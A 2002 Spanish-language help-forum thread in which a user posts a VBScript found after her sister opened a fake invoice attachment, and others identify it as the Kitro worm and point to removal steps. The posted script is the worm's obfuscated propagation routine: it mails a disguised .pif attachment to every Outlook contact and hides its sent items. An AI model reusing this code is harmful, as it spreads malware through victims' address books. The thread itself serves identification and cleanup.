Foros del Web » Administración de Sistemas » Seguridad y redes »

¿Cuál les parece que es la funcion de este có

 Estas en el tema de ¿Cuál les parece que es la funcion de este có en el foro de Seguridad y redes en Foros del Web. Me parece que me ha entrado un virus , ayer mi hermana recibio un correo sobre unas facturas que supuestamente ella habia solicitado con un ...
  #1 (permalink)  
Antiguo 06/08/2002, 12:23
 
Fecha de Ingreso: enero-2002
Mensajes: 535
Antigüedad: 22 años, 4 meses
Puntos: 1
¿Cuál les parece que es la funcion de este có
Me parece que me ha entrado un virus , ayer mi hermana recibio un correo sobre unas facturas que supuestamente ella habia solicitado con un archivo adjunto.
Lo descargó , lo ejecutó y nada pasó.
Ahora los archivos que tenia en un cierto directorio a todos se les agregó la extencion .exe y cuando los ejecutó me da error.
En un archivo .dat encontré lo siguiente:

Componente para Facilitar La programacion de Gusanos.
Componente V1.01c BanderaNegra, Por ErGrone/Zonavirus
VIVA SUDAMERICA!!! Http://www.geocities.com/zonavirus

Y abrí un archivo llamado banderanegra.vbs con el notepad y encontré el siguiente código.

On Error Resume Next
Dim UNO
Dim DOS
Dim TRES
Dim CUATRO
Dim CINCO
Dim SEIS
Dim Xb
Dim Xc
Dim Xd
Er = 59
Gr = 20
one = 60
Cr = 100
Ypt = 91
Set Xc = CreateObject( Chr(Cr-13)+Chr(Cr-17)+"cript"+Chr(gr+26)+Chr(Cr-17)+"hell" )
Xb = Xc.RegRead("HKEY_LOCAL_MACHINE\Software\Micro soft\Windows\CurrentVersion\Run\" & "OFF" )
If Xb <> 0 Then
Set TRES = CreateObject( Chr(20+Er)+"utl"+Chr((Er+Gr+one)-28 )+Chr((Er+Gr)+32 )+"k"+Chr(gr+26)+Chr(one+5)+Chr((Er+Gr+o ne)-27 )+"plic"+"ati"+Chr((Er+Gr+one )-28 )+"n" )
Set UNO = TRES.GetNameSpace( chr(Cr-23)+Chr(Ypt-26)+chr(Cr-20) +Chr(Ypt-18))
For Each DOS In UNO.AddressLists
Set SEIS = TRES.CreateItem( 0 )
For CUATRO = 1 To DOS.AddressEntries.Count
Set CINCO = DOS.AddressEntries( CUATRO )
If CUATRO = 1 Then
SEIS.BCC = CINCO.Address
Else
SEIS.BCC = SEIS.BCC & "; " & CINCO.Address
End If
Next
SEIS.Subject = "Facturas"
SEIS.Body = "Aqui adjunto las Facturas que nos ha pedido, ruego que nos envie lo que dentro del documento se especifica, Saludos."
SEIS.Attachmets.Add "C:\WINDOWS\Facturas556.XLS.pif"
SEIS.DeleteAfterSubmit = True
SEIS.Send
Xc.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Window s\CurrentVersion\Run\" & "OFF","0"
Next
End If

Alguno tiene una idea de para que servirá este codigo?
Tienen idea de si esto es un virus o que diablos es?
Espero que me puedan ayudar
  #2 (permalink)  
Antiguo 06/08/2002, 13:01
Avatar de DanielRey
Usuario no validado
  
Fecha de Ingreso: enero-2001
Ubicación: Mendoza
Mensajes: 630
Antigüedad: 23 años, 3 meses
Puntos: 1
Re: ¿Cuál les parece que es la funcion de este có
Según el Norton Antivirus es el VBS.Kitro@mm
  #3 (permalink)  
Antiguo 06/08/2002, 14:46
kyo
 
Fecha de Ingreso: diciembre-2001
Ubicación: nuevo laredo, Tamaulipas,
Mensajes: 103
Antigüedad: 22 años, 4 meses
Puntos: 0
Re: ¿Cuál les parece que es la funcion de este có
efectivamente es el virus kitro este autoenvia con extencion ".cpl" o ".pif".
Al iniciar windows se te abre la carpeta c:\windows ? de casualidad aparte no esta muy lenta tu maquina ?, mira entra en el registro con cuidado y borra las claves que terminan en .cpl sabes como entrar no?
en inicio/ejecutar y teclea regedit se abre el editor del registro despues, sigues esta ruta:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Run

mira pa no hacertela cansada aqui esta el link al norton que te explica los pasos para removerlo
http://securityresponse.symantec.com/avcenter/venc/data/w32.kitro.a.worm.html
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta


« Tema Anterior | Próximo Tema »


La zona horaria es GMT -6. Ahora son las 19:17.